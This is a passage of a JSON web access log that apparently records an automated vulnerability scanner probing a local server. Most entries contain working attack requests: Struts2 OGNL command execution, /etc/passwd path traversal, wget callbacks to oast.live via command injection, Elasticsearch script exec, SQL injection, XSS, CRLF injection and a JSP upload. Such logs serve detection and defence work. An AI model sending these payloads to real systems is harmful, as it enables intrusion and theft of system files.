/index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/admin/pipelines/create?group=defaultGroup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.hg/hgrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"{\x22objs\x22: [{\x22FID\x22: \x22init\x22}], \x22SID\x22: \x22|wget http://c9v8hn0smpv8c57g0t00u6z6dnan5dzqj.oast.live|\x22, \x22browser\x22: \x22gecko_linux\x22, \x22backend_version\x22: -1, \x22loc\x22: \x22\x22, \x22_cookie\x22: null, \x22wdebug\x22: 0, \x22RID\x22: \x221629210675639_0.5000855117488202\x22, \x22current_uuid\x22: \x22\x22, \x22ipv6\x22: true}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /var HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htaccess.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sensorlist.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp-security-audit-log/failed-logins/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmodule-ee/login.seam HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://c9v8hn0smpv8c57g0t00k4antzjufacn5.oast.live)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"fullPath=/etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modifica_cliente.php?tipo_tabella=%22>&idclienti=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /users/user-dark-features HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.207","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /core/config/databases.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /zms/admin/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/zms/admin/index.php", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?c=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"{\x0D\x0A \x22name\x22: \x22test\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /website/blog/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"fullPath=/Windows/win.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dati/availability_tpl.php?num_app_tipo_richiesti1=%22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"--------------------------aadc326f7ae3eac3\x0D\x0AContent-Disposition: form-data; name=\x22name\x22; filename=\x22../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/297MdsjRIbABA2C0c5EfQeoCcf1.jsp\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0A<%\x0D\x0Aout.println(\x22CVE-2022-26352\x22);\x0D\x0A%>\x0D\x0A--------------------------aadc326f7ae3eac3--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/content/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"action=verify-haras","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/rpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22lang\x22:\x22groovy\x22,\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22cat /etc/passwd\x5C\x22).getText()\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_search HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?v=d HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/nagios3/status.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.211","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/mainfunction.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%252f%255cexample.com%252fa%253fb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MdsjRIbABA2C0c5EfQeoCcf1.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"IWP_JSON_PREFIX","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27297MduR46xpMhZIfoakmew7KSmB%27%29%3C%2Fscript%3E&pw=nordex&language=en","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.052","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /alps/profile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.220","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22userReference\x22:{},\x22loginReference\x22:{\x22link\x22:\x22http://localhost/mgmt/shared/gossip\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mgmt/shared/authn/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"http:","request":"POST /auth/tokens HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 